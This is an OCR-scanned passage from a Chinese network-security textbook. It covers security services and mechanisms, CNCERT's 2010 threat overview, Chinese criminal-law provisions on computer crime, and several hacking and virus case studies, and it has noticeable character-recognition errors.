列 可 用 来 实现 这 些 安全 服务 的 安全 机 制 ， 如 表 1-3 所 示 。 其 基本 的 机 制 有 : 加 密 机 制 、 数 


字 签 名 机 制 、 访 问 控制 机 制 、 数 据 


让 整 性 机 制 、 认 证 交换 机 制 、 通 信 业 务 流 填充 机 制 、 路 


由 控制 和 公证 机 制 〈 把 数据 向 可 信 第 三 方 注册 ， 以 便 可 使 人 相信 数据 的 内 容 、 来 源 、 时 间 


和 传递 过 程 )。 计 算 机 网 络 安全 体系 结构 三 维 图 如 图 1-4 所 示 。 
表 1-3 ”安全 服务 与 安全 机 制 的 关系 


鉴别 


数据 源 发 鉴别 


访问 控制 
连接 机 密 性 
数据 “| 无 连接 机 密 性 
机 密 性 | 选择 字段 机 密 性 
业务 流 机 密 性 - 
可 恢复 的 连接 完整 性 
数据 “| 下 可 恢复 的 连接 完整 性 
完整 性 | 过 择 字 段 的 连接 完整 性 
无 连接 完整 性 
选择 字段 的 无 连接 完整 性 


数据 源 发 证 明 的 抗 抵赖 性 


交付 证 明 的 抗 抵赖 性 


4 OSI 参考 模型 


9 中 
访问 控制 鉴别 一 “而 数 
数据 完整 性 密 字 问 
数据 机 密 性 图 
抗 抵赖 性 名 
妥 全 服务 人 


图 1-4 计算 机 网 络 安全 体系 结构 三 维 图 


1.2 研究 网 络 安全 的 必要 性 和 社会 意义 
1.2.1 网 络 的 安全 威胁 


由 于 互联 网 的 发 展 ， 整 个 世界 经 济 正在 迅速 地 融 为 一 体 ， 而 整个 国家 犹如 一 部 巨大 的 
网 络 机 器 ， 整 个 社会 对 网 络 的 依赖 程度 越 来 越 大 。 伴 随 着 网 络 的 发 展 ， 也 产生 了 各 种 各 样 
的 问题 ， 其 中 安全 问题 尤为 突出 。 了 解 网 络 面临 的 各 种 威胁 ， 防 范 和 消除 这 些 威胁 ， 实 现 
真正 的 网 络 安全 已 经 成 为 网 络 发 展 中 最 重要 的 事情 。 

1， 网 络 的 缺陷 

因特网 的 共享 性 和 开放 性 使 网 上 信息 安全 存在 先天 不 足 ， 因 为 其 赖 以 生存 的 TCP/IP 
协议 簇 缺乏 相应 的 安全 机 制 ， 所 以 因特网 最 初 的 设计 考虑 是 该 网 不 会 因 局 部 故障 而 影响 信 
息 的 传输 ， 基 本 没有 考虑 安全 问题 ， 因 此 它 在 安全 可 靠 、 服 务 质量 、 带 宽 和 方便 性 等 方面 
存在 着 不 适应 性 。 

2. 软件 的 漏洞 

随 着 软件 系统 规模 的 不 断 增 大 ， 系 统 中 的 安全 漏洞 或 “后 门 ”也 不 可 避免 地 存在 ， 比 
如 我 们 常用 的 操作 系统 , 无论 是 Windows 还 是 UNIX 几乎 都 存在 或 多 或 少 的 安全 漏洞 ， 众 
多 的 各 类 服务 器 、 浏 览 器 、 一 些 桌 面 软件 都 被 发 现存 在 各 种 安全 隐患 。 

3， 黑客 的 攻击 
黑客 对 于 大 家 来 说 ， 不 再 是 一 个 高 深 刘 测 的 人 物 ， 黑 客 技 术 逐 渐 被 越 来 越 多 的 人 掌握 
和 发 展 ， 目 前 ， 据 不 完全 统计 ， 世 界 上 有 30 多 万 个 黑客 网 站 ， 这 些 站 点 都 介绍 一 些 攻击 方 
法 和 攻击 软件 的 使 用 以 及 系统 的 一 些 漏洞 ， 因 而 系统 、 站 点 遭受 攻击 的 可 能 性 就 变 大 了 。 
尤其 是 现在 还 缺乏 针对 网 络 犯罪 卓有成效 的 反击 和 跟踪 手段 ， 使 得 黑客 攻击 的 隐蔽 性 深 ， 
破坏 力 强 ， 这 是 网 络 安全 的 主要 威胁 。 

4. 拒绝 服务 攻击 

拒绝 服务 会 影响 许多 与 用 户 或 单位 的 生存 相关 的 重要 任务 。 攻 击 者 通过 一 些 常用 的 黑 
客 手段 侵入 并 控制 一 些 网 站 ， 使 得 网 络 系统 拒绝 服务 ， 造 成 其 网 络 严重 瘫痪 。 因 此 ， 在 将 
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克 络 作 会 友 过 


克 乡 委 会 页 大 理论 与 笑 践 


这 种 系统 连接 到 网 络 之 前 ， 必 须 慎 重地 评价 使 系统 丢失 服务 的 威胁 。 


5. 网 络 病毒 
通过 网 络 传播 计算 机 病毒 ， 其 破坏 性 大 大 高 于 单机 系统 ， 而 且 用 户 很 难 防 范 。 
6. 管理 的 欠缺 


网 络 系统 的 严格 管理 是 企业 、 机 构 及 用 户 免 受 攻击 的 重要 措施 。 事 实 上 ， 很 多 企业 、 
机 构 及 用 户 的 网 站 或 系统 都 琉 于 这 方面 的 管理 。 据 IT 界 企业 团体 ITAA 的 调查 显示 , 美国 
90% 的 IT 企业 对 黑客 攻击 准备 不 足 。 


1.2.2 ”研究 网 络 安 全 的 必要 性 


1999 年 9 月 ， 我 国 成 立国 家 级 网 络 安全 应 急 机 构 CNCERT (国家 互联 网 应 急 中 心 )， 
全 称 是 国家 计算 机 网 络 应 急 技术 处 理 协 调 中 心 ，CNCERT 主要 致力 于 建设 国家 级 的 网 络 安 
全 监测 中 心 、 预 警 中 心 和 应 急 中 心 ， 以 支撑 政府 主管 部 门 履行 网 络 安全 相关 的 社会 管理 和 
公共 服务 职能 ， 支 持 基 础 信息 网 络 的 安全 防护 和 安全 运行 ， 支 援 重要 信息 系统 的 网 络 安全 
监测 、 预 警 和 处 置 ， 国家 互联 网 应 急 中 心 在 我 国 大 陆 31 个 省 、 自 治 区 、 直 辖 市 设 有 分 中 
心 ， 完 成 了 跨 网 络 、 跨 系统 、 跨 地 域 的 公共 互联 网 网 络 安全 应 急 技 术 支 撑 体系 建设 ， 形 成 
了 全 国 性 的 互联 网 网 络 安全 信息 共享 、 技 术 协 同 的 能 力 。 
依据 CNCERT 抽样 监测 结果 和 国家 信息 安全 漏洞 共享 平台 (CNVD ) 发 布 的 数据 表明 ， 
我 国政 府 、 企 业 以 及 广大 互联 网 用 户 的 主要 安全 威胁 来 自 于 软件 高 危 漏 洞 、 恶 意 代码 传播 
以 及 网 站 攻击 。 下 面 ， 通 过 CNCERT 发 布 的 2010 年 互联 网 网 络 安全 态势 综述 ， 从 基础 网 


络 安全 、 重 要 联网 信息 系统 安全 和 公共 网 络 环境 安全 等 方面 简要 介绍 2010 年 的 互联 网 网 
络 安全 态势 。 
1， 基础 网 络 安全 


域名 系统 已 逐渐 成 为 互联 网 安全 的 薄弱 环节 。 例 如 ，2010 年 1 月 12 日 ， 由 于 在 境外 
注册 的 域名 信息 被 自 改 ， 百 度 网 站 发 生 近 4 小 时 的 访问 故障 ， 引 起 网 民 广 泛 关 注 。 

2. 重要 联网 信息 系统 安全 

(1) 政府 网 站 安全 防护 薄弱 。 据 CNCERT 监测 ，2010 年 中 国 大 陆 有 近 3.5 万 个 网 站 
被 黑客 算 改 , 其 中 被 算 改 的 政府 网 站 高 达 4635 个 。 政 府 网 站 安全 性 不 高 不 仅 影响 了 政府 形 
象 和 电子 政务 工作 的 开展 ， 还 给 不 法 分 子 发 布 虚假 信息 或 植 入 网 页 木马 以 可 乘 之 机 ， 造 成 
更 大 的 危害 。 

(2) 金融 行业 网 站 成 为 不 法 分 子 骗取 钱财 和 窃取 隐私 的 重点 目标 。 网 络 违法 犯罪 行为 
的 趋 利 化 特征 明显 ， 大 型 电子 商务 、 金 融 机 构 、 第 三 方 在 线 支付 网 站 成 为 网 络 钓鱼 的 主要 
对 象 ， 黑 客 仿冒 上 述 网 站 或 伪造 购物 网 站 诱 使 用 户 登 录 和 交易 ， 窃 取 用 户 账号 密码 ， 造 成 
用 户 经 济 损失 。2010 年 ，CNCERT 共 接 收 网 络 钓鱼 事件 举报 1597 件 ,“ 中 国 反 钓鱼 网 站 联 
盟 ” 处 理 钓鱼 网 站 事件 20 570 起 。 

(3) 工业 控制 系统 安全 面临 严峻 挑战 。2010 年 9 月 ， 伊 朗 布 舍 尔 核电 站 遭 到 Stuxnet 
病毒 攻击 ， 导 致 核电 设施 推迟 启用 。 这 是 第 一 次 从 虚拟 信息 世界 对 现实 物理 世界 的 网 络 攻 
击 ， 工 业 控 制 系统 在 我 国 应 用 十 分 广泛 ， 工 业 控 制 系统 安全 值得 高 度 关注 。 

3. 公共 网 络 环境 安全 

(1) 木马 和 僵尸 网 络 依然 对 网 络 安全 构成 直接 威胁 。2010 年 ，CNCERT 全 年 共 发 现 


近 500 万 个 境内 主机 卫 地 址 感染 了 木马 和 僵尸 程序 。 

(2) 手机 恶意 程序 日 益 泛 小 引起 社会 关注 。 随 着 移动 互联 网 智能 终端 的 普及 ， 手 机 恶 
意 程序 开始 出 现 并 快速 草 延 。 不 法 分 子 利 用 手机 恶意 程序 窃取 用 户 隐私 信息 、 恶 意 订 购 各 
类 增值 业务 或 发 送 大 量 垃圾 短信 ， 和 危害 用 户 利益 和 网 络 安全 。2010 年 新 截获 手机 恶意 程序 
1600 多 个 ， 累 计 感 染 智 能 终端 800 万 部 以 上 。 

(3) 软件 漏洞 是 信息 系统 安全 的 重大 隐患 。 网 络 设备 、 服 务 器 系统 、 操 作 系统 、 数 据 
库 软件 、 应 用 软件 乃至 安全 防护 产品 普遍 存在 安全 漏洞 , 高 危 漏洞 会 带 来 严重 的 安全 隐患 。 
2010 年 ，CNCERT 共 收 集 整 理 信息 安全 漏洞 3447 个 ， 其 中 高 危 漏洞 649 个 〈 占 18.8%)。 
典型 的 高 危 漏洞 有 : MySQL yaSSL 库 证 书 解析 远程 溢出 漏洞 、Microsoft IE 对 象 重 用 远程 
攻击 漏洞 、Microsoft Windows 快捷 方式 LNK 文件 自动 执行 漏洞 、IBM 公司 Lotus 
Domino/Notes 群 件 平台 密码 散 列 泄露 漏洞 、 工 业 自动 化 控制 软件 KingView 6.5.3 缓存 区 洲 
出 漏洞 等 。 

(4) DDoS 攻击 危害 网 络 安全 。2010 年 ， 分 布 式 拒绝 服务 攻击 呈现 转嫁 攻击 和 大 流量 
攻击 的 特点 ,2010 年 , 某 些 政府 网 站 的 流量 异常 事件 以 及 腾讯 业务 系统 多 次 遭受 攻击 事件 ， 
都 是 缘 于 游戏 私服 网 站 在 遭 到 攻击 后 将 其 网 站 域名 恶意 指向 上 述 系统 所 致 。 另 一 方面 ， 
DDoS 攻击 流量 越 来 越 大 ， 如 针对 “456 游戏 ”网 站 的 攻击 流量 峰值 甚至 超过 100Gbps， 
对 公共 互联 网 的 安全 运行 造成 较 大 冲击 。 由 于 攻击 源 多 采用 虚假 源 人 P 地 址 ， 对 攻击 行为 
的 溯源 和 应 急 处 置 工作 面临 很 大 困难 。 

2010 年 互联 网 网 络 安全 态势 综述 对 2011 年 网 络 安全 趋势 进行 如 下 预测 。 

(1) 网 络 安全 形势 日 益 严峻 ， 针 对 我 国 互联 网 基础 设施 和 人 金融、 证 券 、 交 通 、 能 源 、 
海关 、 税 务 、 工 业 、 科 技 等 重点 行业 的 联网 信息 系统 的 探测 、 渗 透 和 攻击 将 逐渐 增多 。 

(2) 黑客 地 下 产业 将 更 加 专注 于 网 络 钓 鱼 、 攻 击 勒索 、 网 络 刷 票 、 个 人 隐私 窃取 等 能 
够 直接 获 利 或 易于 获 利 的 攻击 方式 ， 大 型 商业 网 站 将 成 为 攻击 的 热点 目标 。 

(3) 网 络 安全 技术 对 抗 将 不 断 升级 。 恶 意 代码 的 变种 数量 将 激增 ,“ 免 杀 ” 能 力 将 进 
一 步 增强 ， 窃 密 木 马 将 不 断 演 变 升级 ， 木 马 投放 方式 将 更 加 隐蔽 和 有 具有 欺骗 性 ， 木 马 抗 查 
杀 能 力 将 更 加 强大 ; 网 络 攻 击 的 规模 将 进一步 扩大 , 给 公共 互联 网 安全 运行 带 来 严重 影响 ; 
为 躲避 处 置 和 打击 ， 网 络 攻击 的 跨 境 特点 将 更 加 突出 。 

(4) 随 着 智能 终端 的 迅速 普及 ， 移 动 互联 网 的 安全 问题 凸显 ， 手 机 恶意 程序 数量 将 急 
剧 增加 ， 其 功能 将 集中 在 恶意 扣 费 、 弹 出 广告 、 垃 圾 短信 和 窃听 窃取 方面 ， 手 机 用 户 的 经 
济 利益 和 个 人 隐私 安全 面临 挑战 。 

(5) 网 络 新 技术 、 新 应 用 莲 勃 发 展 ， 随 着 三 网 融合 、IPv6、 云 计算 、 物 联网 等 技术 的 
试用 和 推广 ， 新 的 安全 问题 将 不 断 出 现 。 

通过 上 面 介绍 的 CNCERT 发 布 的 2010 年 互联 网 网 络 安全 态势 综述 可 知 ， 互 联网 时 时 
刻 刻 都 面临 着 各 种 安全 威胁 ， 维 护 网 络 安全 工作 的 重要 性 日 益 突出 ， 同 时 ， 由 于 我 国 的 自 
身 特点 ， 我 国 网 络 安全 具有 一 些 特 有 的 安全 缺陷 ， 例 如 ， 技 术 被 动 性 引起 的 安全 缺陷 、 人 
员 素 质问 题 引起 的 安全 缺陷 以 及 缺乏 系统 的 安全 标准 所 引起 的 安全 缺陷 ， 因 此 ， 研 究 网 络 
安全 是 非常 必要 的 。 


1.2.3 ”研究 网 络 安 全 的 社会 意义 
目前 ， 研 究 网 络 安全 已 经 不 只 是 为 了 信息 和 数据 的 安全 性 ， 网 络 安全 已 经 渗透 到 国家 
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的 政治 、 经 济 、 军 事 以 及 社会 稳定 等 各 个 领域 。 

1. 网 络 安全 与 政治 

根据 赛 门 铁 克 【信息 安全 领域 全 球 领先 的 解决 方案 提供 商 ) 调查 ， 超 过 一 半 的 企业 表 
示 怀 疑 或 相当 肯定 自己 曾 遭 受过 带 有 特殊 政治 目的 的 网 络 攻击 。 

2. 网 络 安全 与 经 济 

恶意 软件 已 经 发 展 成 一 种 成 功 的 犯罪 业务 模式 ， 涉 及 数 十 亿 资金 ， 它 们 的 目标 是 窃取 
机 密 信息 以 换取 经 济 利益 。 

1999 年 4 月 26 日，CIH 病毒 大 爆发 ， 据 统计 ， 我 国 受 其 影响 的 计算 机 总 量 达 36 万 台 
之 多 ， 经 济 损失 高 达 12 亿 元 。 

2006 年 “熊猫 烧香 ”病毒 在 网 上 广泛 传播 ， 据 了 解 ,“ 熊 猫 烧 香 ” 的 程序 设计 者 李 俊 ， 
每 天 入 账 收 入 近 一 万 元 ， 被 警方 抓获 后 ， 承 认 自 己 获 利 上 千 万 元 。 

3. 网 络 安全 与 军事 

2011 年 ， 美 国 国防 部 公布 《网 络 空间 行动 战略 》 这 是 美军 首 份 网 络 军事 战略 指导 性 
规划 与 策略 ,也 是 落实 2011 年 5 月 美国 政府 出 台 的 《网 络 空间 国际 战略 》 的 一 个 重大 战略 
性 步骤 ， 事 实证 明 ， 美 国 已 经 基本 完成 对 其 网 络 安全 的 全 面 检视 与 认识 工作 ， 转 向 全 面部 
署 与 实际 行动 阶段 。《 网 络 空间 行动 战略 》 大 大 加 重 了 网 络 空间 的 军事 色彩 。 可 以 预见 ， 网 
络 空间 未 来 将 成 为 国际 军事 实力 较量 和 战争 的 新 领域 和 新 战场 ， 为 使 国家 安全 免 遭 威胁 与 
损害 ， 网 络 技术 及 产品 生产 、 应 用 的 自主 性 与 安全 性 将 成 为 一 个 更 加 突出 的 问题 。 

4. 网 络 安全 与 社会 稳定 

2010 年 全 国 工 业 和 信息 化 工作 会 议 中 指出 ， 把 网 络 与 信息 安全 放 在 更 加 突出 的 位 置 ， 
维护 国家 安全 和 社会 稳定 ， 其 中 特别 指出 ， 要 督促 企业 严格 落实 网 络 信息 安全 责任 ， 集 中 
开展 依法 打击 手机 淫秽 色情 专项 行动 ， 加 强 互联 网 基础 管理 ， 配 合 有 关 部 门 坚决 遏制 各 类 
有 害 不 良 信息 传播 ， 充 分 发 挥 中 国 互 联网 协会 等 中 介 组 织 作用 ， 推 进行 业 自 律 。 

2010 年 ， 两 大 互联 网 增值 服务 商 一 一 奇 虎 360 公司 和 腾讯 公司 借 安 全 名 义 发 生 争端 ， 
最 终 发 展 到 各 自在 互联 网 终端 软件 采取 互 斥 技术 ， 导 致 双方 大 量 用 户 受 到 影响 。 


1.3 网 络 安全 的 法 律 法 规 体 系 


1.3.1 计算 机 犯罪 的 概念 

计算 机 犯罪 是 指 行为 人 通过 计算 机 操作 所 实施 的 危害 计算 机 信息 系统 (包括 内 存 数据 
及 程序 ) 安全 以 及 其 他 严重 危害 社会 的 并 应 当 处 以 刑罚 的 行为 。 计算 机 犯罪 产生 于 20 世纪 
60 年 代 ， 随 着 计算 机 技术 的 发 展 和 计算 机 应 用 的 日 益 普及 ， 到 21 世纪 初 ， 计 算 机 犯罪 已 
呈 独 狐 之 势 ， 并 越 来 越 受 到 各 国 的 重视 。 
1.3.2 ”刑法 中 关于 计算 机 犯罪 的 规定 


目前 网 络 安全 方面 的 法 规 已 经 写 入 《中 华人 民 共 和 国 宪法 》 于 1982 年 写 入 《中 华人 
民 共 和 国 商 标 法 》 于 1984 年 写 入 《中 华人 民 共 和 国 专 利 法 》 于 1988 年 写 入 《中 华人 民 


共和 国保 守 国 家 秘密 法 》 于 1993 年 写 入 《中 华人 民 共 和 国 反 不 正当 竞争 法 》 为 了 加 强 对 
计算 机 犯罪 的 打击 力度 ,在 1997 年 对 《中 华人 民 共 和 国 刑法 》 进 行 重新 修订 时 ， 加 入 了 关 
于 计算 机 犯罪 的 三 个 条 款 : 

第 285 条 违反 国家 规定 ， 侵 入 国家 事务 、 国 防 建设 、 尖 端 科学 技术 领域 的 计算 机 信 
息 系统 的 ， 处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

第 286 条 违反 国家 规定 ， 对 计算 机 信息 系统 功能 进行 删除 、 修 改 、 增 加 、 干 扰 ， 造 
成 计算 机 信息 系统 不 能 正常 运行 ， 后 果 严 重 的 ， 处 五 年 以 下 有 期 徒刑 或 者 拘役 ; 后 果 特 别 
严重 的 ， 处 五 年 以 上 有 期 徒刑 。 违 反 国 家 规定 ， 对 计算 机 信息 系统 中 存储 、 处 理 或 者 传输 
的 数据 和 应 用 程序 进行 删除 、 修 改 、 增 加 的 操作 ， 后 果 严 重 的 ， 依 照 前 款 的 规定 处 罚 。 故 
意 制 作 、 传 播 计算 机 病毒 等 破坏 性 程序 ， 影 响 计 算 机 系统 正常 运行 ， 后 果 严 重 的 ， 依 照 第 
一 款 的 规定 处 罚 。 

第 287 条 利用 计算 机 实施 金融 诈骗 、 盗 窃 、 贪 污 、 挪 用 公款 、 窃 取 国 家 秘密 或 者 其 
他 犯罪 的 ， 依 照 本 法 有 关 规定 定罪 处 罚 。 

计算 机 网 络 安全 方面 的 法 规 ， 已 经 写 入 国家 条 例 和 管理 办 法 ， 于 1991 年 写 入 《计算 
机 软件 保护 条 例 》， 于 1994 年 写 入 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 于 
1999 年 写 入 《商用 密码 管理 条 例 》， 于 2000 年 写 入 《互联 网 信息 服务 管理 办 法 》 于 2000 
年 写 入 《中 华人 民 共 和 国电 信条 例 》， 于 2000 年 写 入 《全 国人 大 常委 会 关于 网 络 安 全 和 信 
息 安 全 的 决定 》。 
【案例 1】 


我 国 第 一 例 电 脑 黑客 刑事 案件 


1998 年 6 月 16 日， 上 海 某 信息 网 的 工作 人 员 在 例 行 检查 时 ， 发 现 网 络 遭 到 不 速 之 客 
的 袭击 。7 月 13 日 ， 犯 罪 嫌 疑 人 杨 某 被 逮捕 。 这 是 我 国 第 一 例 电 脑 黑 客 事件 。 

经 调查 ， 此 黑客 先后 侵入 网 络 中 的 8 台 服 务 器 ， 破 译 了 网 络 大 部 分 工作 人 员 和 500 多 
个 合法 用 户 的 账号 和 密码 ， 其 中 包括 两 台 服 务 器 上 超级 用 户 的 账号 和 密码 。 

22 岁 的 杨 某 是 国内 一 著名 高 校 数学 研究 所 计算 数学 专业 的 研究 生 , 具有 国家 计算 机 软 
件 高 级 程序 员 资格 证 书 ， 具 有 相当 高 的 计算 机 技术 技能 。 据 说 ， 他 进行 电脑 犯罪 的 历史 可 
追溯 到 1996 年 ， 当 时 , 杨 某 借助 某 高 校 校园 网 攻击 了 某 科 技 网 并 获得 成 功 。 此 后 , 杨 某 又 
利用 为 一 电脑 公司 工作 的 机 会 , 进入 上 海 某 信息 网 络 , 其 间 仅 非法 使 用 时 间 就 达 2000 多 小 
时 ， 造 成 这 一 网 络 直接 经 济 损失 高 达 1.6 万 元 人 民 币 。 

据悉 ， 杨 某 是 以 “破坏 计算 机 信息 系统 ”的 罪名 被 逮捕 的 。 据 考证 ， 这 是 修订 后 的 刑 
法 实施 以 来 ， 我 国 第 一 次 以 该 罪名 侦查 批捕 的 刑事 犯罪 案件 。 
【案例 2】 


福建 首 例 “ 黑 客 ”入 侵 破坏 交警 网 信息 案 


2002 年 12 月 4 日， 泉州 市 公安 局 公共 信息 网 络 安全 监察 科 接 到 泉州 交警 部 门 报案 : 
近 一 段 时 间 以 来 ， 交 警部 门 计算 机 信息 系统 屡屡 受到 “黑客 ”非法 入 侵 ， 计 算 机 内 的 部 分 
数据 和 应 用 程序 被 多 次 删除 、 修 改 。 

监察 科 立 即 组 成 专案 组 展开 侦查 ， 发 现 ， 非 法 侵入 交警 计算 机 网 络 系统 的 犯罪 对 象 为 
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署名 FJJJZD 和 CXH 的 两 个 用 户 ， 这 两 个 用 户 的 地 理 位 置 均 位 于 泉州 市 丰 泽 区 。 

2002 年 12 月 9 日 深夜 ,“ 黑 客 ” 再 次 入 侵 交 警 计算 机 网 络 系统 。 在 福建 省 公安 厅 的 指 
导 下 ， 泉 州 警 方 立即 出 击 ， 将 丰 泽 区 普 明 村 一 民宅 包围 ， 当 办 案 民 警 破门 而 入 时 ， 犯 罪 嫌 
疑 人 陈 某 尚 未 停止 手中 的 操作 。 

经 审讯 ， 陈 某 交 代 ， 他 是 丰 泽 区 某 交 通 设施 公司 的 职员 ， 另 有 一 名 同伙 是 该 公司 的 办 
公 室 主任 章 某 。 办 案 民 和 警 随后 将 章 某 抓 获 。 次 日 凌晨 ， 陈 某 和 章 某 又 “ 抖 ”出 了 另外 4 名 
犯罪 同伙 ， 泉 州 警 方 兵 分 数 路 ， 先 后 将 林 某 等 4 名 涉案 的 泉州 交警 直属 大 队 协 管 员 抓 捕 
归案 。 

警方 查 明 ， 章 某 和 陈 某所 在 单位 曾 接受 福建 省 公安 交警 总 队 委 托 ， 负 责 制 作 福建 省 加 
驶 证 副 证 。 去 年 7 月 份 ， 陈 某 破解 交警 部 门 计算 机 网 络 系统 密码 之 后 ， 先 后 在 家 中 和 公司 
办 公 室 拨号 进入 公安 交警 部 门 计算 机 系统 ， 对 驾驶 员 违 章 记录 进行 修改 ， 同 时 修改 其 他 交 
警 驾 管 业务 记录 等 。 

据 介 绍 ， 目 前 ,泉州 市 交警 部 门 对 违章 驾驶 员 采 取 扣 分 制 ， 一 年 内 累计 违章 被 扣 满 12 
分 者 旦 在 3 个 月 内 未 接受 处 理 的 ， 将 被 交警 部 门 依法 吊销 驾驶 证 。 在 日 常 的 交通 管理 中 ， 
芍 驶 员 如 被 发 现 有 违章 行为 ， 执 勤 的 交警 人 员 会 依法 开具 违章 处 罚单 给 违章 驾驶 员 ， 同 时 
将 违章 情况 记录 入 交警 计算 机 网 络 系统 。 林 某 等 4 名 交警 协 管 员 利 用 工作 之 便 ， 将 违章 驾 
驶 员 手 中 的 违章 处 罚单 收集 后 交 给 陈 某 、 章 某 ， 然 后 再 由 陈 某 通 过 远程 拨号 连接 到 交警 计 
算 机 信息 系统 ， 进 行 修改 或 删除 违章 信息 。 同 时 ， 林 某 等 4 名 交警 协 管 员 还 充当 着 “业务 
员 ” 的 和 角色， 并立 下 “规矩 ” 每 销 掉 6 分 以 上 ， 违 章 芍 驶 员 必 须 “ 交 费 ”850 元 。 在 短 短 
的 4 个 多 月 的 时 间 里 ， 这 个 犯罪 团伙 就 件 取 暴 利 10 多 万 元 。 

【案例 3】 


“熊猫 烧香 ”病毒 大 案 


湖北 省 公安 厅 2007 年 2 月 12 日 宣布 ， 制 作 传播 计算 机 “熊猫 烧香 ”病毒 的 6 名 犯罪 
嫌疑 人 日 前 被 抓获 ， 这 是 中 国 破获 的 首 例 制作 计算 机 病毒 大 案 。 根 据 统一 部 署 ， 湖 北 网 监 
在 浙江 、 山 东 、 广 西 、 天 津 、 广 东 、 四 川 、 江 西 、 云 南 、 新 疆 、 河 南 等 地 公安 机 关 的 配合 
下 ， 侦 破 了 制作 传播 “熊猫 烧香 ”病毒 案 ， 抓 获 李 某 〈 男 ，25 岁 ， 武 汉 新 洲 区 人 )、 雷 茶 
( 男 ，25 岁 ， 武 汉 新 洲 区 人 ) 等 6 名 犯罪 嫌疑 人 。 

2006 年 底 ， 中 国 互联 网 上 大 规模 爆发 “熊猫 烧香 ”病毒 及 其 变种 ， 该 病毒 通过 多 种 方 
式 进行 传播 ， 并 将 感染 的 所 有 程序 文件 改 成 能 猫 举 着 三 根 香 的 模样 。 该 病毒 还 具有 盗 取 用 
户 游戏 账号 、QQ 账号 等 功能 。“ 熊 猫 烧香 ”病毒 传播 速度 快 ， 危害 范围 广 , 截至 案 发 为 止 ， 
已 有 上 百 万 个 人 用 户 、 网 吧 及 企业 局 域 网 用 户 遭 受 感染 和 破坏 ， 引 起 社会 各 界 高 度 关注 。 
在 《2006 年 度 中 国 大 陆地 区 电脑 病毒 疫情 和 互联 网 安全 报告 》 的 十 大 病毒 排行 中 ,“ 熊 猫 
烧香 ”病毒 成 为 “ 毒 王 ”。2007 年 1 月 中 旬 ， 湖 北 省 网 监 部 门 根据 公安 部 公共 信息 网 络 安 
全 监察 局 的 部 署 ， 对 “熊猫 烧香 ”病毒 的 制作 者 开展 调查 。 

经 查 ,“ 熊 猫 烧 香 ” 病 毒 的 制作 者 为 湖北 省 武汉 市 的 李 某 ， 据 李 某 交代 ， 其 于 2006 年 
10 月 16 日 编写 了 “熊猫 烧香 ”病毒 并 在 网 上 广泛 传播 ， 并 且 还 以 自己 出 售 和 由 他 人 代 卖 
的 方式 , 在 网 络 上 将 该 病毒 销售 给 120 余人 ,非法 获 利 10 万 余 元 。 经 病毒 购买 者 进一步 传 
播 ， 该 病毒 的 各 种 变种 在 网 上 大 面积 传播 ， 对 互联 网 用 户 计算 机 安全 造成 了 严重 破坏 。 李 


某 还 于 2003 年 编写 了 “武汉 男生 ”病毒 、2005 年 编写 了 “武汉 男生 2005” 病 毒 及 “QQ 
尾巴 ”病毒 

2007 年 9 月 24 日， 湖北 省 仙桃 市 人 民法 院 公开 开庭 审理 了 此 案 。 被 告 人 李 某 犯 破 坏 
计算 机 信息 系统 罪 ， 判 处 有 期 徒刑 四 年 ; 被 告 人 王 某 犯 破坏 计算 机 信息 系统 罪 ， 判 处 有 期 
徒刑 两 年 六 个 月 ; 被 告 人 张 某 犯 破坏 计算 机 信息 系统 罪 ， 判 处 有 期 徒刑 两 年 ;被告 人 雷 某 
犯 破坏 计算 机 信息 系统 罪 ， 判 处 有 期 徒刑 一 年 。 
【案例 4】 


首 例 两 岸 黑客 联合 入 侵 网 络 银 行 案 告破 


台湾 警方 2004 年 6 月 9 日 宣布 侦破 首 宗 两 岸 黑 客 联 手 入 侵 台 湾 网 络 银行 的 重大 金融 
犯罪 , 在 花莲 市 逮捕 台湾 黑客 陈 崇 顺 ， 查 扣 邮 件 账号 资料 4500 万 笔 。 嫌犯 在 3 个 月 内 盗 领 
5 家 网 络 银行 数 百 万 元 新 台币 , 被 害 客户 中 , 甚至 有 存款 金额 高 达 2 亿 元 新 台币 的 “大 户 ”。 
由 于 可 能 已 有 10 万 笔 网 络 银行 账号 密码 外 流 到 大 陆 黑 客 手 上 ,警方 已 紧急 呼吁 全 岛 网 络 银 
行 客户 全 面 更 改 账 户 密码 。 

据 介绍 ， 台 警方 专案 小 组 会 同 “ 行 政 主管 部 门 ”” “财政 主 管 部 门 ”” 财 金 信息 公司 等 
单位 ， 全 力 侦办 发 生 在 2004 年 3 月 间 的 网 络 黑客 大 盗 入 侵 台 湾 数 十 家 网 络 银行 客户 账户 ， 
将 至 少数 百 万 元 新 台币 的 存款 盗 领 一 空 案 ， 在 历经 两 个 多 月 的 追查 后 ， 终 于 宣告 侦破 。 

警方 于 2004 年 6 月 8 日 持 搜捕 证 赴 花 莲 直 的 黄龙 ， 当 场 破 获 该 黑客 盗 领 集团 的 台湾 
地 区 犯罪 工作 室 和 布 满 密密麻麻 网 络 线路 的 电脑 机 房 ， 现 场 查 出 作案 用 的 网 络 服务 器 主机 
4 部 、 调 制 解 调 器 4 台 、 网 络 交换 机 一 台 、 人 台湾 各 家 网 络 银行 客户 账号 密码 及 知名 网 络 公 
司 拍卖 账号 密码 数 万 笔 、 邮 件 账号 名 单 4500 万 笔 , 并 将 涉案 盗 领 转账 的 台湾 主要 犯罪 嫌疑 
人 陈 崇 顺 抓获 。 

台湾 警方 称 ， 陈 崇 顺 和 大 陆 黑 客 勾结 ， 先 取得 最 新 型 木马 程式 ， 再 利用 工作 室 中 的 4 
台 服 务 器 主机 ， 将 木马 程式 伪装 成 微软 公司 或 是 色情 、 拍 卖 网 站 等 广告 信件 大 量 寄 发 电子 
邮件 ， 自 2004 年 2 月 中 旬 开 始 发 送 电子 邮件 ， 一 直 持续 到 3 月 中 名， 总计 散发 了 1800 多 
万 份 的 有 效 电子 邮件 ， 好 奇 的 群众 被 广告 信 吸 引 开启 邮件 ， 在 不 知 不 觉 中 下 载 木 马 程式 常 
驻 电脑 中 ， 陈 崇 顺 再 伺机 撤 取 被 害 人 在 网 络 上 使 用 的 网 络 银行 网 址 及 账号 、 密 码 等 机 密 资 
料 ， 自 动 回 传 给 位 于 大 陆 的 伺服 主机 ， 待 陈 崇 顺 登入 该 主机 收取 账号 密码 等 资料 后 ， 再 通 
过 台湾 主机 层 层 转 接 遥 控 位 于 世界 各 地 的 跳板 主机 ， 侵 入 岛 内 网 络 银行 客户 账户 中 盗 转 存 
